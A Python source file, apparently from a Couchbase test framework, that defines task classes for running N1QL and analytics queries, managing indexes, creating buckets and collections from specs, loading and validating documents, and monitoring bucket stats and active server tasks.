self.test_log.debug(actual_result)
raise Exception("INDEX usage in Query %s :: "
"NOT FOUND %s :: "
"as observed in result %s"
% (self.query, self.index_name,
self.actual_result))
self.test_log.debug(" <<<<< Done VERIFYING Query {0} >>>>>>"
.format(self.query))
return True
except N1QLQueryException as e:
# subsequent query failed! exit
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
class RunQueriesTask(Task):
"""
    Task that runs CBAS and N1QL queries.
    Runs all the queries given in the 'queries' list.
    Parameters:
    cluster - cluster object against which the queries are run
              (TestInputServer objects are taken from it)
    queries - List of either cbas or n1ql queries (list)
    task_manager - task manager object to run parallel tasks (TaskManager)
    helper - helper object, either cbas or n1ql (CbasUtilV2, CbasUtil,
             N1QLHelper)
    query_type - type of query, legal values are cbas, n1ql (string)
    is_prepared - if False, the queries in the list are prepared
                  (formatted with dataset/keyspace names) first (bool)
-- Unprepared query eg:
select count(*) from {0} where mutated > 0;
"""
def __init__(self, cluster, queries, task_manager, helper, query_type,
run_infinitely=False, parallelism=1, is_prepared=True):
super(RunQueriesTask, self).__init__("RunQueriesTask_started_%s"
% (time.time()))
self.cluster = cluster
self.queries = queries
self.query_type = query_type
if query_type == "n1ql":
self.n1ql_helper = helper
if query_type == "cbas":
self.cbas_util = helper
self.task_manager = task_manager
self.run_infinitely = run_infinitely
self.parallelism = parallelism
self.query_tasks = []
self.result = []
self.is_prepared = is_prepared
self.debug_msg = self.query_type + "-DEBUG-"
def call(self):
start = 0
end = self.parallelism
self.start_task()
try:
if not self.is_prepared:
if self.query_type == "cbas":
self.prepare_cbas_queries()
elif self.query_type == "n1ql":
self.prepare_n1ql_queries()
while True:
for query in self.queries[start:end]:
if hasattr(self, "n1ql_helper"):
                        query_task = N1QLQueryTask(self.cluster.master, "", query,
n1ql_helper=self.n1ql_helper,
verify_results=False,
is_explain_query=True)
self.task_manager.add_new_task(query_task)
self.query_tasks.append(query_task)
if hasattr(self, "cbas_util"):
query_task = CBASQueryExecuteTask(
self.cluster, self.cbas_util, None, query)
self.task_manager.add_new_task(query_task)
self.query_tasks.append(query_task)
for query_task in self.query_tasks:
self.task_manager.get_task_result(query_task)
self.log.info(self.debug_msg + "ActualResult: " + str(
query_task.actual_result))
if not self.run_infinitely:
self.result.append(query_task.actual_result)
self.query_tasks = []
start = end
end += self.parallelism
if start >= len(self.queries):
if self.run_infinitely:
start = 0
end = self.parallelism
else:
break
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
return
self.complete_task()
def prepare_cbas_queries(self):
datasets = self.cbas_util.get_datasets(self.cluster, retries=20)
if not datasets:
self.set_exception(Exception("Datasets not available"))
prepared_queries = []
for query in self.queries:
for dataset in datasets:
prepared_queries.append(query.format(CBASHelper.format_name(
dataset)))
self.queries = prepared_queries
self.log.info(self.debug_msg + str(self.queries))
def prepare_n1ql_queries(self):
buckets = self.n1ql_helper.buckets
prepared_queries = []
        bucket_helper = BucketHelper(self.cluster.master)
for bucket in buckets:
status, content = bucket_helper.list_collections(
bucket.name)
if status:
content = json.loads(content)
for scope in content["scopes"]:
for collection in scope["collections"]:
keyspace = CBASHelper.format_name(bucket.name,
scope["name"],
collection["name"])
prepared_queries.extend([query.format(keyspace) for
query in self.queries])
self.queries = prepared_queries
class N1QLTxnQueryTask(Task):
def __init__(self, stmts, n1ql_helper,
commit=True,
scan_consistency='REQUEST_PLUS'):
super(N1QLTxnQueryTask, self).__init__("query_n1ql_task_%s"
% (time.time()))
self.stmt = stmts
self.scan_consistency = scan_consistency
self.commit = commit
self.n1ql_helper = n1ql_helper
def call(self):
self.start_task()
try:
# Query and get results
self.test_log.info(" <<<<< START Executing N1ql Transaction >>>>>>")
sleep(5)
self.query_params = self.n1ql_helper.create_txn()
for query in self.stmt:
result = self.n1ql_helper.run_cbq_query(query,
query_params=self.query_params)
sleep(2)
self.n1ql_helper.end_txn(self.query_params, self.commit)
self.test_log.debug(" <<<<< Done Executing N1ql Transaction >>>>>>")
self.test_log.info("Expected Query to fail but passed")
# catch and set all unexpected exceptions
except Exception:
self.test_log.info(" <<<<< Query Failed as Expected >>>>>>")
class CreateIndexTask(Task):
def __init__(self, server, bucket, index_name, query, n1ql_helper=None,
retry_time=2, defer_build=False, timeout=240):
super(CreateIndexTask, self).__init__("Task_create_index_%s_%s"
% (bucket, index_name))
self.server = server
self.bucket = bucket
self.defer_build = defer_build
self.query = query
self.index_name = index_name
self.n1ql_helper = n1ql_helper
self.retry_time = retry_time
self.retried = 0
self.timeout = timeout
def call(self):
self.start_task()
try:
# Query and get results
self.n1ql_helper.run_cbq_query(query=self.query, server=self.server)
self.result = self.check()
self.complete_task()
return self.result
except CreateIndexException as e:
self.test_log.debug("Initial query failed. Will retry..")
if self.retried < self.retry_time:
self.retried += 1
sleep(self.retry_time)
self.call()
# catch and set all unexpected exceptions
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
def check(self):
try:
# Verify correctness of result set
check = True
if not self.defer_build:
check = self.n1ql_helper.is_index_online_and_in_list(
self.bucket, self.index_name, server=self.server,
timeout=self.timeout)
if not check:
raise CreateIndexException("Index {0} not created as expected"
.format(self.index_name))
return check
except CreateIndexException as e:
# subsequent query failed! exit
self.test_log.error(e)
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
class BuildIndexTask(Task):
def __init__(self, server, bucket, query, n1ql_helper=None,
retry_time=2):
super(BuildIndexTask, self).__init__("Task_Build_index_%s_%s"
% (bucket, query))
self.server = server
self.bucket = bucket
self.query = query
self.n1ql_helper = n1ql_helper
self.retry_time = retry_time
self.retried = 0
def call(self):
self.start_task()
try:
# Query and get results
self.n1ql_helper.run_cbq_query(query=self.query,
server=self.server)
self.result = self.check()
self.complete_task()
return self.result
except CreateIndexException as e:
self.test_log.debug("Initial query failed, will retry..")
if self.retried < self.retry_time:
self.retried += 1
sleep(self.retry_time)
self.call()
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
def check(self):
try:
# Verify correctness of result set
return True
except CreateIndexException as e:
# subsequent query failed! exit
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
class MonitorIndexTask(Task):
def __init__(self, server, bucket, index_name, n1ql_helper=None,
retry_time=2, timeout=240):
super(MonitorIndexTask, self).__init__("build_index_task_%s_%s"
% (bucket, index_name))
self.server = server
self.bucket = bucket
self.index_name = index_name
self.n1ql_helper = n1ql_helper
self.retry_time = 2
self.timeout = timeout
def call(self):
self.start_task()
try:
check = self.n1ql_helper.is_index_online_and_in_list(
self.bucket, self.index_name, server=self.server,
timeout=self.timeout)
if not check:
raise CreateIndexException("Index {0} not created as expected"
.format(self.index_name))
return_value = self.check()
self.complete_task()
return return_value
except CreateIndexException as e:
# initial query failed, try again
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
def check(self):
try:
return True
except CreateIndexException as e:
# subsequent query failed! exit
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
class DropIndexTask(Task):
def __init__(self, server, bucket, index_name, query, n1ql_helper=None,
retry_time=2):
super(DropIndexTask, self).__init__("drop_index_task")
self.server = server
self.bucket = bucket
self.query = query
self.index_name = index_name
self.n1ql_helper = n1ql_helper
self.timeout = 900
        self.retry_time = retry_time
self.retried = 0
def call(self):
self.start_task()
try:
# Query and get results
check = self.n1ql_helper._is_index_in_list(
self.bucket, self.index_name, server=self.server)
if not check:
raise DropIndexException(
"index {0} does not exist will not drop"
.format(self.index_name))
self.n1ql_helper.run_cbq_query(query=self.query, server=self.server)
return_value = self.check()
except N1QLQueryException as e:
self.test_log.debug("Initial query failed, will retry..")
if self.retried < self.retry_time:
self.retried += 1
                sleep(self.retry_time)
self.call()
# catch and set all unexpected exceptions
except DropIndexException as e:
            self.set_exception(e)
def check(self):
try:
# Verify correctness of result set
check = self.n1ql_helper._is_index_in_list(
self.bucket, self.index_name, server=self.server)
if check:
raise Exception("Index {0} not dropped as expected"
.format(self.index_name))
return True
except DropIndexException as e:
# subsequent query failed! exit
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
class PrintBucketStats(Task):
def __init__(self, cluster, bucket, monitor_stats=list(), sleep=1):
super(PrintBucketStats, self).__init__("PrintBucketStats_%s_%s"
% (bucket.name, time.time()))
self.cluster = cluster
self.bucket = bucket
self.bucket_helper = BucketHelper(self.cluster.master)
self.sleep = sleep
self.monitor_stats = monitor_stats
self.stop_task = False
# To avoid running a dummy task
if len(monitor_stats) == 0:
self.stop_task = True
# List of stats to track / plot
self.ops_rate_trend = list()
self.drain_rate_trend = list()
def record_bucket_ops(self, bucket_stats, ops_rate):
if 'op' in bucket_stats and \
'samples' in bucket_stats['op'] and \
'ops' in bucket_stats['op']['samples']:
ops = bucket_stats['op']['samples']['ops'][-1]
self.test_log.debug("Ops rate for '%s': %f"
% (self.bucket.name, ops))
if ops_rate and ops_rate[-1] > ops:
self.ops_rate_trend.append(ops_rate)
ops_rate = list()
ops_rate.append(ops)
return ops_rate
def print_ep_queue_size(self, bucket_stats):
if 'op' in bucket_stats \
and 'samples' in bucket_stats['op'] \
and 'ep_queue_size' in bucket_stats['op']['samples']:
ep_q_size = bucket_stats['op']['samples']['ep_queue_size'][-1]
self.test_log.debug("ep_queue_size for {}: {}\
".format(self.bucket.name, ep_q_size))
def plot_all_graphs(self):
plot_graph(self.test_log, self.bucket.name, self.ops_rate_trend)
def end_task(self):
self.stop_task = True
def call(self):
self.start_task()
ops_rate = list()
while not self.stop_task:
try:
bucket_stats = \
self.bucket_helper.fetch_bucket_stats(self.bucket.name)
except Exception as e:
self.log.warning("Exception while fetching bucket stats: %s"
% e)
sleep(2, message="Updating BucketHelper with new master",
log_type="infra")
self.bucket_helper = BucketHelper(self.cluster.master)
continue
if "doc_ops" in self.monitor_stats:
ops_rate = self.record_bucket_ops(bucket_stats, ops_rate)
elif "drain_rate" in self.monitor_stats:
self.record_drain_rate(bucket_stats)
if "ep_queue_size" in self.monitor_stats:
self.print_ep_queue_size(bucket_stats)
# Sleep before fetching next stats
sleep(self.sleep, log_type="infra")
if ops_rate:
self.ops_rate_trend.append(ops_rate)
self.plot_all_graphs()
self.complete_task()
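# Example of driving PrintBucketStats directly (hypothetical objects; within
# this module the equivalent monitoring is usually started through
# bucket.stats.manage_task("start", task_manager, ...) by the loader tasks):
#
#   stats_task = PrintBucketStats(cluster, bucket,
#                                 monitor_stats=["doc_ops"], sleep=1)
#   task_manager.add_new_task(stats_task)
#   ...   # run the doc-loading workload
#   stats_task.end_task()
#   task_manager.get_task_result(stats_task)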
class BucketCreateTask(Task):
def __init__(self, server, bucket):
super(BucketCreateTask, self).__init__("bucket_%s_create_task"
% bucket.name)
self.server = server
self.bucket = bucket
self.bucket_priority = 8
if self.bucket.priority is None \
or self.bucket.priority == Bucket.Priority.LOW:
self.bucket_priority = 3
self.retries = 0
def call(self):
try:
rest = RestConnection(self.server)
except ServerUnavailableException as error:
self.log.error("RestConnection failed for {0}: {1}"
.format(self.server.ip, error))
self.result = False
return
info = rest.get_nodes_self()
if self.bucket.ramQuotaMB <= 0:
self.size = info.memoryQuota * 2 / 3
if int(info.port) in xrange(9091, 9991):
try:
self.port = info.port
BucketHelper(self.server).create_bucket(self.bucket.__dict__)
# return_value = self.check()
self.complete_task()
self.result = True
return
except Exception as e:
self.test_log.error(str(e))
self.set_exception(e)
version = rest.get_nodes_self().version
try:
if float(version[:2]) >= 3.0 and self.bucket_priority is not None:
self.bucket.threadsNumber = self.bucket_priority
BucketHelper(self.server).create_bucket(self.bucket.__dict__)
# return_value = self.check()
self.complete_task()
self.result = True
return
except BucketCreationException as e:
self.result = False
self.test_log.error(str(e))
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
self.test_log.error(str(e))
def check(self):
try:
# if self.bucket.bucketType == 'memcached' or \
# int(self.server.port) in xrange(9091, 9991):
# return True
if MemcachedHelper.wait_for_memcached(self.server,
self.bucket.name):
self.test_log.debug(
"Bucket '{0}' created with per node RAM quota: {1}"
.format(self.bucket, self.bucket.ramQuotaMB))
return True
else:
self.test_log.error("Vbucket map not ready after try %s"
% self.retries)
if self.retries >= 5:
return False
except Exception as e:
self.test_log.warn(
"Exception: {0}. vbucket map not ready after try {1}"
.format(e, self.retries))
if self.retries >= 5:
self.result = False
self.test_log.error(str(e))
        self.retries = self.retries + 1
sleep(5, "Wait for vBucket map to be ready", log_type="infra")
self.check()
class BucketCreateFromSpecTask(Task):
def __init__(self, task_manager, kv_nodes, bucket_name, bucket_spec):
super(BucketCreateFromSpecTask, self) \
.__init__("Bucket_create_task_%s" % bucket_name)
self.task_manager = task_manager
self.servers = kv_nodes
self.bucket_spec = bucket_spec
self.bucket_spec["name"] = bucket_name
self.retries = 0
self.rest = RestConnection(self.servers[0])
self.bucket_helper = BucketHelper(self.servers[0])
# Used to store the Created Bucket() object, for appending into
# bucket_utils.buckets list
self.bucket_obj = Bucket()
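    # Assumed shape of bucket_spec (inferred from the accesses below; the
    # spec builder itself lives elsewhere in the framework):
    #
    #   bucket_spec = {
    #       "name": "bucket_1",            # filled in by __init__
    #       MetaConstants.CREATE_COLLECTIONS_USING_MANIFEST_IMPORT: False,
    #       "scopes": {
    #           "_default": {"collections": {"_default": {}}},
    #           "scope_1": {"collections": {"col_1": {"maxTTL": 0}}},
    #       },
    #       # plus any Bucket.get_params() keys (ramQuotaMB, priority, ...)
    #   }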
def call(self):
self.result = True
self.start_task()
bucket_params = Bucket.get_params()
for key, value in self.bucket_spec.items():
if key in bucket_params:
setattr(self.bucket_obj, key, value)
self.create_bucket()
if CbServer.default_collection not in \
self.bucket_spec[
"scopes"][CbServer.default_scope][
"collections"].keys():
self.bucket_helper.delete_collection(self.bucket_spec["name"],
CbServer.default_scope,
CbServer.default_collection)
self.bucket_obj \
.scopes[CbServer.default_scope] \
.collections \
.pop(CbServer.default_collection, None)
if self.bucket_spec[
MetaConstants.CREATE_COLLECTIONS_USING_MANIFEST_IMPORT]:
self.create_collections_using_manifest_import()
for scope_name, scope_spec in self.bucket_spec["scopes"].items():
scope_spec["name"] = scope_name
for collection_name, collection_spec \
in scope_spec["collections"].items():
if collection_name == CbServer.default_collection:
continue
collection_spec["name"] = collection_name
else:
for scope_name, scope_spec in self.bucket_spec["scopes"].items():
scope_spec["name"] = scope_name
scope_create_thread = threading.Thread(
target=self.create_scope_from_spec,
args=[scope_spec])
scope_create_thread.start()
scope_create_thread.join()
self.complete_task()
def create_collections_using_manifest_import(self):
json_content = dict()
json_content["scopes"] = list()
for s_name, s_dict in self.bucket_spec["scopes"].items():
scope = dict()
scope["name"] = s_name
scope["collections"] = list()
for c_name, c_dict in s_dict["collections"].items():
col = dict()
col["name"] = c_name
if "maxTTL" in c_dict:
col["maxTTL"] = c_dict["maxTTL"]
scope["collections"].append(col)
json_content["scopes"].append(scope)
self.bucket_helper.import_collection_using_manifest(
self.bucket_spec["name"], str(json_content).replace("'", '"'))
def create_bucket(self):
self.bucket_obj.threadsNumber = 3
if str(self.bucket_obj.priority) == "high" \
or str(self.bucket_obj.priority) == str(Bucket.Priority.HIGH):
self.bucket_obj.threadsNumber = 8
try:
self.bucket_helper.create_bucket(self.bucket_obj.__dict__)
except BucketCreationException as e:
self.result = False
self.test_log.error(str(e))
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
self.test_log.error(str(e))
self.set_exception(e)
def create_scope_from_spec(self, scope_spec):
self.test_log.debug("Creating scope for '%s' - %s"
% (self.bucket_obj.name, scope_spec["name"]))
if scope_spec["name"] != CbServer.default_scope:
status, content = self.bucket_helper.create_scope(
self.bucket_obj.name,
scope_spec["name"])
if status is False:
self.set_exception("Create scope failed for %s:%s, "
"Reason - %s"
% (self.bucket_obj.name,
scope_spec["name"],
content))
self.result = False
return
self.bucket_obj.stats.increment_manifest_uid()
for collection_name, collection_spec \
in scope_spec["collections"].items():
if collection_name == CbServer.default_collection:
continue
collection_spec["name"] = collection_name
collection_create_thread = threading.Thread(
target=self.create_collection_from_spec,
args=[scope_spec["name"], collection_spec])
collection_create_thread.start()
collection_create_thread.join(30)
def create_collection_from_spec(self, scope_name, collection_spec):
self.test_log.debug("Creating collection for '%s:%s' - %s"
% (self.bucket_obj.name, scope_name,
collection_spec["name"]))
status, content = self.bucket_helper.create_collection(
self.bucket_obj.name,
scope_name,
collection_spec)
if status is False:
self.result = False
self.set_exception("Create collection failed for "
"%s:%s:%s, Reason - %s"
% (self.bucket_obj.name,
scope_name,
collection_spec["name"],
content))
self.bucket_obj.stats.increment_manifest_uid()
class MutateDocsFromSpecTask(Task):
def __init__(self, cluster, task_manager, loader_spec,
sdk_client_pool,
batch_size=500,
process_concurrency=1,
print_ops_rate=True,
track_failures=True):
super(MutateDocsFromSpecTask, self).__init__(
"MutateDocsFromSpecTask_%s" % time.time())
self.cluster = cluster
self.task_manager = task_manager
self.loader_spec = loader_spec
self.process_concurrency = process_concurrency
self.batch_size = batch_size
self.print_ops_rate = print_ops_rate
self.result = True
self.load_gen_tasks = list()
self.load_subdoc_gen_tasks = list()
self.print_ops_rate_tasks = list()
self.sdk_client_pool = sdk_client_pool
self.track_failures = track_failures
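    # Assumed shape of loader_spec (inferred from the accesses in
    # execute_tasks() / create_tasks_for_collections(); built elsewhere):
    #
    #   loader_spec = {
    #       bucket_obj: {"scopes": {
    #           "scope_1": {"collections": {
    #               "col_1": {
    #                   "create": {"doc_gen": doc_generator_obj,
    #                              "doc_ttl": 0},
    #                   # "success"/"fail" dicts are added per op at runtime
    #               }}}}}}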
def call(self):
self.start_task()
self.get_tasks()
self.execute_tasks(execute_tasks=self.load_gen_tasks)
self.execute_tasks(execute_tasks=self.load_subdoc_gen_tasks)
self.complete_task()
return self.result
def execute_tasks(self, execute_tasks):
if self.print_ops_rate:
for bucket in self.loader_spec.keys():
bucket.stats.manage_task(
"start", self.task_manager,
cluster=self.cluster,
bucket=bucket,
monitor_stats=["doc_ops"],
sleep=1)
try:
for task in execute_tasks:
self.task_manager.add_new_task(task)
for task in execute_tasks:
try:
self.task_manager.get_task_result(task)
self.log.debug("Items loaded in task %s are %s"
% (task.thread_name, task.docs_loaded))
i = 0
while task.docs_loaded < (task.generator._doc_gen.end -
task.generator._doc_gen.start) \
and i < 60:
sleep(1, "Bug in java futures task. "
"Items loaded in task %s: %s"
% (task.thread_name, task.docs_loaded),
log_type="infra")
i += 1
except Exception as e:
self.test_log.error(e)
finally:
self.loader_spec[
task.bucket]["scopes"][
task.scope]["collections"][
task.collection][
task.op_type]["success"].update(task.success)
self.loader_spec[
task.bucket]["scopes"][
task.scope]["collections"][
task.collection][
task.op_type]["fail"].update(task.fail)
if task.fail.__len__() != 0:
target_log = self.test_log.error
self.result = False
else:
target_log = self.test_log.debug
target_log("Failed to load %d docs from %d to %d of thread_name %s"
% (task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end,
task.thread_name))
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate:
for bucket in self.loader_spec.keys():
bucket.stats.manage_task(
"stop", self.task_manager,
cluster=self.cluster,
bucket=bucket,
monitor_stats=["doc_ops"],
sleep=1)
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in execute_tasks:
self.task_manager.stop_task(task)
self.log.debug("Task '%s' complete. Loaded %s items"
% (task.thread_name, task.docs_loaded))
def create_tasks_for_bucket(self, bucket, scope_dict):
load_gen_for_scopes_create_threads = list()
for scope_name, collection_dict in scope_dict.items():
scope_thread = threading.Thread(
target=self.create_tasks_for_scope,
args=[bucket, scope_name, collection_dict["collections"]])
scope_thread.start()
load_gen_for_scopes_create_threads.append(scope_thread)
for scope_thread in load_gen_for_scopes_create_threads:
scope_thread.join(120)
def create_tasks_for_scope(self, bucket, scope_name, collection_dict):
load_gen_for_collection_create_threads = list()
for c_name, c_data in collection_dict.items():
collection_thread = threading.Thread(
target=self.create_tasks_for_collections,
args=[bucket, scope_name, c_name, c_data])
collection_thread.start()
load_gen_for_collection_create_threads.append(collection_thread)
for collection_thread in load_gen_for_collection_create_threads:
collection_thread.join(60)
def create_tasks_for_collections(self, bucket, scope_name,
col_name, col_meta):
for op_type, op_data in col_meta.items():
# Create success, fail dict per load_gen task
op_data["success"] = dict()
op_data["fail"] = dict()
generators = list()
generator = op_data["doc_gen"]
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(int((generator.end - generator.start)
/ self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for doc_gen in generators:
task_id = "%s_%s_%s_%s_ttl=%s" % (self.thread_name,
bucket.name,
scope_name, col_name,
op_data["doc_ttl"])
if op_type in DocLoading.Bucket.DOC_OPS:
track_failures = op_data.get("track_failures",
self.track_failures)
doc_load_task = LoadDocumentsTask(
self.cluster, bucket, None, doc_gen,
op_type, op_data["doc_ttl"],
scope=scope_name, collection=col_name,
task_identifier=task_id,
sdk_client_pool=self.sdk_client_pool,
batch_size=self.batch_size,
durability=op_data["durability_level"],
timeout_secs=op_data["sdk_timeout"],
time_unit=op_data["sdk_timeout_unit"],
skip_read_on_error=op_data["skip_read_on_error"],
suppress_error_table=op_data["suppress_error_table"],
track_failures=track_failures,
skip_read_success_results=op_data[
"skip_read_success_results"])
self.load_gen_tasks.append(doc_load_task)
elif op_type in DocLoading.Bucket.SUB_DOC_OPS:
subdoc_load_task = LoadSubDocumentsTask(
self.cluster, bucket, None, doc_gen,
op_type, op_data["doc_ttl"],
create_paths=True,
xattr=op_data["xattr_test"],
scope=scope_name, collection=col_name,
task_identifier=task_id,
sdk_client_pool=self.sdk_client_pool,
batch_size=self.batch_size,
durability=op_data["durability_level"],
timeout_secs=op_data["sdk_timeout"],
time_unit=op_data["sdk_timeout_unit"],
skip_read_success_results=op_data[
"skip_read_success_results"])
self.load_subdoc_gen_tasks.append(subdoc_load_task)
def get_tasks(self):
tasks = list()
load_gen_for_bucket_create_threads = list()
for bucket, scope_dict in self.loader_spec.items():
bucket_thread = threading.Thread(
target=self.create_tasks_for_bucket,
args=[bucket, scope_dict["scopes"]])
bucket_thread.start()
load_gen_for_bucket_create_threads.append(bucket_thread)
for bucket_thread in load_gen_for_bucket_create_threads:
bucket_thread.join(timeout=180)
return tasks
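# Illustrative sketch (not part of the original suite) of the range
# partitioning used by create_tasks_for_collections above: a doc_gen covering
# [start, end) is split into sub-ranges of size
# max((end - start) / process_concurrency, 1), with the last sub-range
# clipped to the generator's end. The helper below only demonstrates the
# arithmetic and does not touch a real document generator.
def _example_partition_ranges(gen_start, gen_end, process_concurrency):
    gen_range = max(int((gen_end - gen_start) / process_concurrency), 1)
    ranges = list()
    for pos in range(gen_start, gen_end, gen_range):
        ranges.append((pos, min(pos + gen_range, gen_end)))
    return ranges
# e.g. _example_partition_ranges(0, 1000, 3)
#      -> [(0, 333), (333, 666), (666, 999), (999, 1000)]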
class ValidateDocsFromSpecTask(Task):
def __init__(self, cluster, task_manager, loader_spec,
sdk_client_pool, check_replica=False,
batch_size=500,
process_concurrency=1):
super(ValidateDocsFromSpecTask, self).__init__(
"ValidateDocsFromSpecTask_%s" % time.time())
self.cluster = cluster
self.task_manager = task_manager
self.loader_spec = loader_spec
self.process_concurrency = process_concurrency
self.batch_size = batch_size
self.check_replica = check_replica
self.result = True
self.validate_data_tasks = list()
self.validate_data_tasks_lock = Lock()
self.sdk_client_pool = sdk_client_pool
def call(self):
self.start_task()
self.get_tasks()
try:
for task in self.validate_data_tasks:
self.task_manager.add_new_task(task)
for task in self.validate_data_tasks:
self.task_manager.get_task_result(task)
except Exception as e:
self.result = False
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in self.validate_data_tasks:
self.task_manager.stop_task(task)
self.log.debug("Task '%s' complete. Loaded %s items"
% (task.thread_name, task.docs_loaded))
self.test_log.error(e)
self.set_exception(e)
self.complete_task()
return self.result
def create_tasks_for_bucket(self, bucket, scope_dict):
load_gen_for_scopes_create_threads = list()
for scope_name, collection_dict in scope_dict.items():
scope_thread = threading.Thread(
target=self.create_tasks_for_scope,
args=[bucket, scope_name, collection_dict["collections"]])
scope_thread.start()
load_gen_for_scopes_create_threads.append(scope_thread)
for scope_thread in load_gen_for_scopes_create_threads:
scope_thread.join(120)
def create_tasks_for_scope(self, bucket, scope_name, collection_dict):
load_gen_for_collection_create_threads = list()
for c_name, c_data in collection_dict.items():
collection_thread = threading.Thread(
target=self.create_tasks_for_collections,
args=[bucket, scope_name, c_name, c_data])
collection_thread.start()
load_gen_for_collection_create_threads.append(collection_thread)
for collection_thread in load_gen_for_collection_create_threads:
collection_thread.join(60)
def create_tasks_for_collections(self, bucket, scope_name,
col_name, col_meta):
for op_type, op_data in col_meta.items():
# Create success, fail dict per load_gen task
op_data["success"] = dict()
op_data["fail"] = dict()
generators = list()
generator = op_data["doc_gen"]
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(int((generator.end - generator.start)
/ self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for doc_gen in generators:
if op_type in DocLoading.Bucket.DOC_OPS:
if op_data["doc_ttl"] > 0:
op_type = DocLoading.Bucket.DocOps.DELETE
task = ValidateDocumentsTask(
self.cluster, bucket, None, doc_gen,
op_type, op_data["doc_ttl"],
None, batch_size=self.batch_size,
timeout_secs=op_data["sdk_timeout"],
compression=None, check_replica=self.check_replica,
scope=scope_name, collection=col_name,
sdk_client_pool=self.sdk_client_pool,
is_sub_doc=False,
suppress_error_table=op_data["suppress_error_table"])
self.validate_data_tasks.append(task)
def get_tasks(self):
tasks = list()
bucket_validation_threads = list()
for bucket, scope_dict in self.loader_spec.items():
bucket_thread = threading.Thread(
target=self.create_tasks_for_bucket,
args=[bucket, scope_dict["scopes"]])
bucket_thread.start()
bucket_validation_threads.append(bucket_thread)
for bucket_thread in bucket_validation_threads:
bucket_thread.join(timeout=180)
return tasks
class MonitorActiveTask(Task):
"""
Attempt to monitor active task that is available in _active_tasks API.
It allows to monitor indexer, bucket compaction.
Execute function looks at _active_tasks API and tries to identifies
task for monitoring and its pid by:
task type('indexer' , 'bucket_compaction', 'view_compaction')
and target value (for example "_design/ddoc" for indexing,
bucket "default" for bucket compaction or
"_design/dev_view" for view compaction).
wait_task=True means that task should be found in the first attempt
otherwise, we can assume that the task has been completed(reached 100%)
Check function monitors task by pid that was identified in execute func
and matches new progress result with the previous.
task is failed if:
progress is not changed during num_iterations iteration
new progress was gotten less then previous
task is passed and completed if:
progress reached wait_progress value
task was not found by pid(believe that it's over)
"""
def __init__(self, server, type, target_value, wait_progress=100,
num_iterations=100, wait_task=True):
super(MonitorActiveTask, self).__init__("MonitorActiveTask_%s"
% server.ip)
self.server = server
self.type = type # indexer or bucket_compaction
self.target_key = ""
if self.type == 'indexer':
# no special actions
pass
elif self.type == "bucket_compaction":
self.target_key = "original_target"
elif self.type == "view_compaction":
self.target_key = "designDocument"
else:
raise Exception("type %s is not defined!" % self.type)
self.target_value = target_value
self.wait_progress = wait_progress
self.num_iterations = num_iterations
self.wait_task = wait_task
self.rest = RestConnection(self.server)
self.current_progress = None
self.current_iter = 0
self.task = None
def call(self):
tasks = self.rest.ns_server_tasks()
for task in tasks:
if task["type"] == self.type \
and ((self.target_key == "designDocument"
and task[self.target_key] == self.target_value)
or (self.target_key == "original_target"
and task[self.target_key][
"type"] == self.target_value)
or (self.type == 'indexer')):
self.current_progress = task["progress"]
self.task = task
self.test_log.debug(
"Monitoring active task was found:" + str(task))
self.test_log.debug("Progress %s:%s - %s %%"
% (self.type, self.target_value,
task["progress"]))
if self.current_progress >= self.wait_progress:
self.test_log.debug("Got expected progress: %s"
% self.current_progress)
self.result = True
if self.task is None:
# task is not performed
self.test_log.warning("Expected active task %s:%s was not found"
% (self.type, self.target_value))
self.result = True
elif self.wait_task:
self.test_log.debug("Polling for %s task to complete" % self.type)
self.check()
else:
# task was completed
self.test_log.debug("Task for monitoring %s:%s completed"
% (self.type, self.target_value))
self.result = True
def check(self):
tasks = self.rest.ns_server_tasks()
if self.task in tasks and self.task is not None:
for task in tasks:
# if task still exists
if task == self.task:
self.test_log.debug("Progress %s:%s - %s %%"
% (self.type, self.target_value,
task["progress"]))
# reached expected progress
if task["progress"] >= self.wait_progress:
self.test_log.info("Progress for task %s reached %s"
% (self.task, self.wait_progress))
self.result = True
return
# progress value was changed
if task["progress"] > self.current_progress:
self.current_progress = task["progress"]
self.current_iter = 0
self.check()
# progress value was not changed
elif task["progress"] == self.current_progress:
if self.current_iter < self.num_iterations:
sleep(2, "Wait for next progress update",
log_type="infra")
self.current_iter += 1
self.check()
else:
self.test_log.error(
"Progress not changed for %s during %s sec"
% (self.type, 2 * self.num_iterations))
self.result = False
return
else:
self.test_log.error(
"Progress for task %s:%s changed direction!"
% (self.type, self.target_value))
self.result = False
return
else:
self.test_log.info("Task %s completed on server" % self.task)
self.result = True
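# Illustrative usage sketch (not part of the original suite). `server` and
# `task_manager` are assumed to be a configured server object and an
# initialised task-manager instance, as used elsewhere in this file.
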